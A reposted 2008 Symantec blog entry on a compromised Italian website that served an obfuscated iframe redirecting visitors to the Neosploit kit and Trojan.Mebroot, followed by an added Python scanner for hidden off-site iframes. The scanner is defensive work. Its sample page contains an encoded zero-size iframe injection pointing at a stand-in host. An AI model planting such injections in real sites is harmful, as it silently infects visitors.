Thursday, April 03, 2008 10:46 AM
cmosby
Symantec Security Response Weblog: Mebroot Spreading through High-Traffic, Compromised Web Sites
Symantec is tracking a growing number of high-traffic Web sites that are compromised and then used to spread malicious code. After the breach our MSS team spotted on Tata, we have been notified of another Web site with a similar issue.
Today the Italian Web site www.emule-italia.it had been compromised and was hosting an obfuscated script:
When deobfuscated, the script revealed an iframe pointing to http://[REMOVED]xes.com/ld/grb, which redirected users to a server (http://[REMOVED]fir.com/cgi-bin/mail.cgi?p=grobin) hosting the Neosploit tool. Neosploit forces vulnerable PCs to download and install the latest version of the infamous Trojan.Mebroot.
Symantec notified the ISP involved about this issue and the ISP has since worked to remove the malicious content from the affected Web site. High-traffic Web sites are increasingly targeted, because the huge number of visits they receive turns into a huge number of machines getting compromised in a short period of time. Therefore, application security is even more important for these sites: periodic penetration testing, code review, and sound application security practices (please see http://www.symantec.com/business/solutions/whitepapers.jsp?solid=security) in the overall development lifecycle can protect site owners from these kinds of threats.
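The check below is an added example, not code from the original post or from Symantec: a way for a site owner to scan their own pages for iframes that point off-site, including ones that appear only after a script body is decoded. The obfuscation used in this incident is not shown on the page, so percent-encoding and String.fromCharCode are assumed here; the sample page and host names are constructed.

```python
import re
from urllib.parse import unquote, urlparse

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
CHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)", re.I)


def _charcodes(match):
    """Replace a String.fromCharCode(...) call with the characters it builds."""
    codes = (int(n) for n in re.findall(r"\d{1,7}", match.group(1)))
    return "".join(chr(c) for c in codes if c < 0x110000)


def decode_layers(text, max_rounds=5):
    """Undo percent-encoding and fromCharCode until the text stops changing."""
    for _ in range(max_rounds):
        decoded = CHARCODE_RE.sub(_charcodes, unquote(text))
        if decoded == text:
            break
        text = decoded
    return text


def find_offsite_iframes(html, own_hosts):
    """Return [(src, hidden)]; hidden means the URL appears only after decoding."""
    findings = []
    for text in [html] + [decode_layers(s) for s in SCRIPT_RE.findall(html)]:
        for src in IFRAME_RE.findall(text):
            try:
                host = urlparse(src).hostname  # None for relative (same-site) URLs
            except ValueError:
                host = src  # unparseable URL: report it rather than skip it
            finding = (src, src not in html)
            if host and host.lower() not in own_hosts and finding not in findings:
                findings.append(finding)
    return findings


# Constructed sample page (assumed obfuscation, reserved example domains):
# one legitimate same-site iframe and one injected, percent-encoded script.
SAMPLE_PAGE = """<html><body>
<iframe src="/player.html"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//injected.example.net/in%22%20width%3D0%20height%3D0%3E%3C/iframe%3E'))</script>
</body></html>"""

if __name__ == "__main__":
    for src, hidden in find_offsite_iframes(SAMPLE_PAGE, {"www.example.org"}):
        print(("hidden " if hidden else "plain  ") + src)
```

Run against a known-good baseline of each page, any new "hidden" finding is worth investigating, since legitimate embeds rarely need to be encoded.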
A very special thanks to Mr. Marco Cazzaniga for this heads up and for providing his continuous support to our team.
Posted by Andrea Del Miglio on April 2, 2008 12:00 PM
Source: Symantec Security Response Weblog: Mebroot Spreading through High-Traffic, Compromised Web Sites
Filed under: Internet Hacks, Security, Cybercrime, Software Vulnerabilities